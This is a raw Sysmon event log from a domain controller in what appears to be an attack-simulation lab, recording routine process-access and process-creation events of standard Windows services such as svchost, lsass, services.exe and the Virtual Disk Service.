10:40:10.088{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E0A-5F80-3800-000000007F01}3448C:\Windows\System32\vds.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001276Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.059{733EE690-3DF7-5F80-0A00-000000007F01}852916C:\Windows\system32\services.exe{733EE690-3E09-5F80-2F00-000000007F01}2464C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|C:\Windows\system32\services.exe+18ff|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001275Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.059{733EE690-3DF7-5F80-0A00-000000007F01}852916C:\Windows\system32\services.exe{733EE690-3E0A-5F80-3800-000000007F01}3448C:\Windows\System32\vds.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|C:\Windows\system32\services.exe+18ff|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001274Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.059{733EE690-3DF7-5F80-0B00-000000007F01}868988C:\Windows\system32\lsass.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001273Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.059{733EE690-3DF7-5F80-0B00-000000007F01}868988C:\Windows\system32\lsass.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001272Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.059{733EE690-3DF7-5F80-0500-000000007F01}6442420C:\Windows\system32\csrss.exe{733EE690-3E0A-5F80-3800-000000007F01}3448C:\Windows\System32\vds.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000001271Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.059{733EE690-3DF7-5F80-0A00-000000007F01}8522564C:\Windows\system32\services.exe{733EE690-3E0A-5F80-3800-000000007F01}3448C:\Windows\System32\vds.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+12939|C:\Windows\system32\services.exe+66f4|C:\Windows\system32\services.exe+5154|C:\Windows\system32\services.exe+d608|C:\Windows\system32\services.exe+4c6c|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x80000000000000001270Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.047{733EE690-3E0A-5F80-3800-000000007F01}3448C:\Windows\System32\vds.exe10.0.14393.2608 (rs1_release.181024-1742)Virtual Disk ServiceMicrosoft® Windows® Operating SystemMicrosoft Corporationvds.exeC:\Windows\System32\vds.exeC:\Windows\system32\NT AUTHORITY\SYSTEM{733EE690-3DF7-5F80-E703-000000000000}0x3e70SystemMD5=EC0D95737DE497BA0AD2223322B21280,SHA256=DE976B547872B0919E16D5A97902B95893AD5B76DE6A11BE5F874EADBCA49F93,IMPHASH=3F541E0A1D775ACA4A7D5FBDFF8433C5{733EE690-3DF7-5F80-0A00-000000007F01}852C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x80000000000000001269Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.044{733EE690-3DF7-5F80-0B00-000000007F01}868988C:\Windows\system32\lsass.exe{733EE690-3DF7-5F80-0A00-000000007F01}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001268Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.044{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3DF7-5F80-0B00-000000007F01}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001267Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.044{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3DF7-5F80-0B00-000000007F01}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001266Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.044{733EE690-3DF7-5F80-0B00-000000007F01}868988C:\Windows\system32\lsass.exe{733EE690-3DF7-5F80-0A00-000000007F01}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001265Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.041{733EE690-3DF7-5F80-0B00-000000007F01}868908C:\Windows\system32\lsass.exe{733EE690-3E09-5F80-2F00-000000007F01}2464C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001264Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.041{733EE690-3DF7-5F80-0B00-000000007F01}868908C:\Windows\system32\lsass.exe{733EE690-3E09-5F80-2F00-000000007F01}2464C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001263Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.039{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001262Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.039{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001261Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.039{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001260Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.036{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E0A-5F80-3700-000000007F01}3368C:\Windows\System32\vdsldr.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001259Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.026{733EE690-3DF7-5F80-0500-000000007F01}644792C:\Windows\system32\csrss.exe{733EE690-3E0A-5F80-3700-000000007F01}3368C:\Windows\System32\vdsldr.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000001258Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.026{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E0A-5F80-3700-000000007F01}3368C:\Windows\System32\vdsldr.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x80000000000000001257Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.025{733EE690-3E0A-5F80-3700-000000007F01}3368C:\Windows\System32\vdsldr.exe10.0.14393.0 (rs1_release.160715-1616)Virtual Disk Service LoaderMicrosoft® Windows® Operating SystemMicrosoft Corporationvdsldr.exeC:\Windows\System32\vdsldr.exe -EmbeddingC:\Windows\system32\NT AUTHORITY\SYSTEM{733EE690-3DF7-5F80-E703-000000000000}0x3e70SystemMD5=E5C3B321907C73E782280BE427599F14,SHA256=43F0AF018DC498619222CF16E1C9BDE2F7710732686DC361E4D692B7EFB4DDF9,IMPHASH=D6207B24445355CEA1AC6C8E9A2BA2B9{733EE690-3DF9-5F80-0C00-000000007F01}588C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x80000000000000001256Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.005{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-3600-000000007F01}3252C:\Windows\system32\wbem\unsecapp.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001255Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:09.997{733EE690-3DF7-5F80-0500-000000007F01}6441144C:\Windows\system32\csrss.exe{733EE690-3E09-5F80-3600-000000007F01}3252C:\Windows\system32\wbem\unsecapp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000001254Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:09.997{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-3600-000000007F01}3252C:\Windows\system32\wbem\unsecapp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x80000000000000001253Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:09.996{733EE690-3E09-5F80-3600-000000007F01}3252C:\Windows\System32\wbem\unsecapp.exe10.0.14393.2515 (rs1_release_1.180830-1044)Sink to receive asynchronous callbacks for WMI client applicationMicrosoft® Windows® Operating SystemMicrosoft Corporationunsecapp.dllC:\Windows\system32\wbem\unsecapp.exe -EmbeddingC:\Windows\system32\NT AUTHORITY\SYSTEM{733EE690-3DF7-5F80-E703-000000000000}0x3e70SystemMD5=2E49BB6C9F6599F518FE30BE2F000247,SHA256=20F499D581CF4AF331D8EC8B1E07A32CC1A695EF6790B51DA5EE223C5867154F,IMPHASH=A3CC49DF67C2278F822C9EBB9908BF09{733EE690-3DF9-5F80-0C00-000000007F01}588C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x80000000000000001252Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:09.997{733EE690-3DF7-5F80-0B00-000000007F01}8681096C:\Windows\system32\lsass.exe{733EE690-3DF6-5F80-0100-000000007F01}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001251Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 